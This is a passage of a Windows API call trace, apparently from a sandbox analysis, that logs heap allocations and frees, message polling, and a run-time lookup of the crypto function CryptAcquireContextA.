0x2e54ff8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.362] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0236.362] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0236.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.362] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0236.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0236.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0236.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0236.363] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0236.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0236.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0236.364] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0236.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0236.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0236.364] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0236.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0236.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0236.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0236.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0236.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0236.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0236.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0236.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0236.369] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d28 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0236.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0236.370] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.370] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0236.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0236.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0236.370] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0236.370] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0236.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0236.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0236.370] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.371] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0236.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0236.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0236.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0236.372] HeapFree (in: 